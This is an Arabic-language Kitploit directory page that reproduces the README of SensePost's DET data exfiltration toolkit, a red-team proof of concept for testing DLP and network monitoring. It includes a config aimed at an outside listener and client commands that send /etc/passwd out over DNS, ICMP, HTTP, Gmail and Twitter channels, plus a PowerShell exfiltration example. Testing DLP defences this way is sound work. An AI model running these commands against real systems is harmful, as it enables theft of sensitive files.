Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
DET — (قابلة للتوسيع) أداة استخراج البيانات (DET) | Kitploit
أدوات/GitHubGitHub/sensepost/det
أدوات التشفير/فك التشفيرتسريب البياناتأمن الشبكاتاختبار الاختراقالفريق الأحمرتحليل DNS
GitHubsensepost/det

DET

(قابلة للتوسيع) أداة استخراج البيانات (DET)

عرض المستودع
821190منذ 8 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

DET (قابل للتوسيع) مجموعة أدوات تسريب البيانات

DET (مُقدَّم كما هو) هو برهان مفهوم لإجراء تسريب البيانات باستخدام قناة واحدة أو عدة قنوات في الوقت نفسه.

هذا برهان مفهوم يهدف إلى تحديد نقاط فشل محتملة في أنظمة منع تسرب البيانات (DLP). لا ينبغي أبدًا استخدامه لتسريب بيانات حسّاسة/حية (مثلاً في تقييم)

الفكرة كانت إنشاء مجموعة أدوات عامة لتوصيل أي نوع من البروتوكولات/الخدمات لاختبار تكوين حلول مراقبة الشبكة ومنع تسرب البيانات (DLP) ضد تقنيات تسريب البيانات المختلفة.

المستودع الرئيسي انتقل الآن إلى هنا.

الشرائح

عُرض DET في BSides Ljubljana في 9 مارس 2016 وستكون الشرائح متاحة هنا. الشرائح متاحة هنا.

مثال استخدام (إضافة ICMP)

جانب الخادم:

asciicast

جانب العميل:

asciicast

استخدام يجمع بين قناتين (Gmail/Twitter)

جانب الخادم:

asciicast

جانب العميل:

asciicast

التثبيت

استنساخ المستودع:

root@kitploit:~
git clone https://github.com/sensepost/DET.git

ثم:

root@kitploit:~
pip install -r requirements.txt --user

الإعداد

لاستخدام DET، ستحتاج إلى تكوينه وإضافة الإعدادات المناسبة (مثل SMTP/IMAP، عبارة مرور تشفير AES256، إلخ). تم توفير ملف مثال للتكوين باسم: config-sample.json

root@kitploit:~
{
    "plugins": {
        "http": {
            "target": "192.168.1.101",
            "port": 8080
        },
        "google_docs": {
            "target": "192.168.1.101",
            "port": 8080,
        },
        "dns": {
            "key": "google.com",
            "target": "192.168.1.101",
            "port": 53
        },
        "gmail": {
            "username": "[email protected]",
            "password": "ReallyStrongPassword",
            "server": "smtp.gmail.com",
            "port": 587
        },
        "tcp": {
            "target": "192.168.1.101",
            "port": 6969
        },
        "udp": {
            "target": "192.168.1.101",
            "port": 6969
        },
        "twitter": {
            "username": "PaulWebSec",
            "CONSUMER_TOKEN": "XXXXXXXXX",
            "CONSUMER_SECRET": "XXXXXXXXX",
            "ACCESS_TOKEN": "XXXXXXXXX",
            "ACCESS_TOKEN_SECRET": "XXXXXXXXX"
        },
        "icmp": {
            "target": "192.168.1.101"
        }
    },
    "AES_KEY": "THISISACRAZYKEY",
    "sleep_time": 10
}

الاستخدام

استخدام المساعدة

root@kitploit:~
python det.py -h
usage: det.py [-h] [-c CONFIG] [-f FILE] [-d FOLDER] [-p PLUGIN] [-e EXCLUDE]
              [-L]

Data Exfiltration Toolkit (SensePost)

optional arguments:
  -h, --help  show this help message and exit
  -c CONFIG   Configuration file (eg. '-c ./config-sample.json')
  -f FILE     File to exfiltrate (eg. '-f /etc/passwd')
  -d FOLDER   Folder to exfiltrate (eg. '-d /etc/')
  -p PLUGIN   Plugins to use (eg. '-p dns,twitter')
  -e EXCLUDE  Plugins to exclude (eg. '-e gmail,icmp')
  -L          Server mode

جانب الخادم:

لتحميل كل إضافة:

root@kitploit:~
python det.py -L -c ./config.json

لتحميل وحدات twitter و gmail فقط:

root@kitploit:~
python det.py -L -c ./config.json -p twitter,gmail

لتحميل كل إضافة واستبعاد DNS:

root@kitploit:~
python det.py -L -c ./config.json -e dns

جانب العميل:

لتحميل كل إضافة:

root@kitploit:~
python det.py -c ./config.json -f /etc/passwd

لتحميل وحدات twitter و gmail فقط:

root@kitploit:~
python det.py -c ./config.json -p twitter,gmail -f /etc/passwd

لتحميل كل إضافة واستبعاد DNS:

root@kitploit:~
python det.py -c ./config.json -e dns -f /etc/passwd

وفي PowerShell (وحدة HTTP):

root@kitploit:~
PS C:\Users\user01\Desktop>
PS C:\Users\user01\Desktop> . .\http_exfil.ps1
PS C:\Users\user01\Desktop> HTTP-exfil 'C:\path\to\file.exe'

الوحدات

حتى الآن، يدعم DET بروتوكولات متعددة، مدرجة هنا:

  • HTTP(S)
  • ICMP
  • DNS
  • SMTP/IMAP (مثل Gmail)
  • TCP خام
  • تنفيذ PowerShell (HTTP، DNS، ICMP، SMTP (مستخدم مع Gmail))

و"خدمات" أخرى:

  • Google Docs (غير مصادق)
  • Twitter (رسائل مباشرة)

وحدات تجريبية

حتى الآن، أنا مشغول بتنفيذ وحدات جديدة جاهزة تقريبًا للشحن، بما في ذلك:

  • Skype (تم 95%)
  • Tor (تم 80%)
  • Github (تم 30/40%)

خريطة الطريق

  • إضافة تشفير مناسب (مثل AES-256) بفضل ryanohoro
  • الضغط (مهم للغاية!) بفضل chokepoint
  • إخفاء البيانات المناسب ودمج Cloakify Toolset
  • وحدات FTP، FlickR LSB Steganography و Youtube

المراجع

بعض المراجع/الاعتمادات الرائعة للأشخاص الذين استلهمت منهم بمشاريعهم:

  • https://github.com/nullbind/Powershellery/ من Nullbind.
  • https://github.com/ytisf/PyExfil، رائع حقًا.
  • https://github.com/m57/dnsteal من m57.
  • https://github.com/3nc0d3r/NaishoDeNusumu من 3nc0d3r.
  • https://github.com/glennzw/exphil من Glenn Wilkinson.
  • WebExfile من Saif El-Sherei

الاتصال/المساهمة

يمكنك التواصل معي على Twitter @PaulWebSec. لا تتردد إذا كنت ترغب في المساهمة، استنساخ، تفريع، تقديم طلب سحب (PR) وما إلى ذلك.

الترخيص

DET مرخص بموجب رخصة MIT. يمكن الحصول على أذونات تتجاوز نطاق هذه الرخصة على [email protected]

تنزيل الأداة